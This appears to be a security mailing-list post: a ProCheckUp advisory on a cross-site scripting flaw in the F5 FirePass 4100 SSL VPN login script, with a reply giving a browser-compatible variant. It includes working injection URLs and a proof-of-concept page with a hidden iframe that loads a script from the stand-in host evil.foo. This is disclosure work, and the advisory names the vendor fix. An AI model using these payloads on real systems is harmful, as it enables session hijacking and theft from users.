Update: To exploit this in both firefox and IE requires an extra char ("=") in the end. Using the same PoC URL we get: https://target.tld/my.logon.php3?"></script><textarea>HTML_injection_test</textarea><!--= Client environment: firefox and IE 6.0.2900.2180 Ricardo Martins, CISA Security Consultant Mobile. +351 933 478 679 Chief Security Officers, S.A. Ed. Infante D. Henrique Rua João Chagas, 53 - 1º esq. Cruz Quebrada 1495-764 Dafundo Portugal Tel. +351 210 111 616 :: Fax. +351 210 111 618 :: email. info@xxxxxx :: web. http://www.cso.pt __________________________________________________________________ On Fri, Nov 30, 2007 at 12:50 PM, <research@xxxxxxxxxxxxxx> wrote: PR07-15: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100 SSL VPN 'my.logon.php3' server-side script Date Found: 19th June 2007 Successfully tested on: version 5.5.2 F5 Networks has confirmed the following versions to be vulnerable: FirePass versions 5.4.1 - 5.5.2 FirePass versions 6.0 - 6.0.1 Description: F5 Networks FirePass 4100 SSL VPN is vulnerable to XSS within the "my.logon.php3" server-side script. No authentication is required to exploit this vulnerability. Consequences: An attacker may be able to cause execution of malicious scripting code in the browser of a user who visits a specially-crafted URL to an F5 Firepass device, or visits a malicious page that makes a request to such URL. Such code would run within the security context of the target domain. This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e. admin session IDs) to unauthorised third parties. Proof of concept (PoC) URL: https://target.tld/my.logon.php3?"></script><textarea>HTML_injection_test</textarea><!-- The payload in the example is "></script><textarea>HTML_injection_test</textarea><!-- which injects a 'textarea' box The following PoC HTML page would run JavaScript without any restrictions from a third-party file ('http://www.evil.foo/b' in this case): <html> <iframe src="https://target.tld/my.logon.php3?%22%3E%3C/script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--" width="0%" height="0%" name="xss=document.body.appendChild(document.createElement('script'));xss.setAttribute('src','http://www.evil.foo/b')"></iframe> </html> Successfully tested on: Server environment: F5 FirePass 4100 Client environment: Microsoft Internet Explorer 7.0.5730.11 Severity: Medium/High Author: Richard Brain of ProCheckUp Ltd (www.procheckup.com) With thanks to Petko D. Petkov for suggesting the eval(name) technique. References: http://www.procheckup.com/Vulnerability_2007.php http://www.f5.com/products/FirePass/ ProCheckUp thanks F5 Networks for working with us. Fix: F5 Networks has issued SOL7923: https://support.f5.com/kb/en-us/solutions/public/7000/900/SOL7923.html?sr=1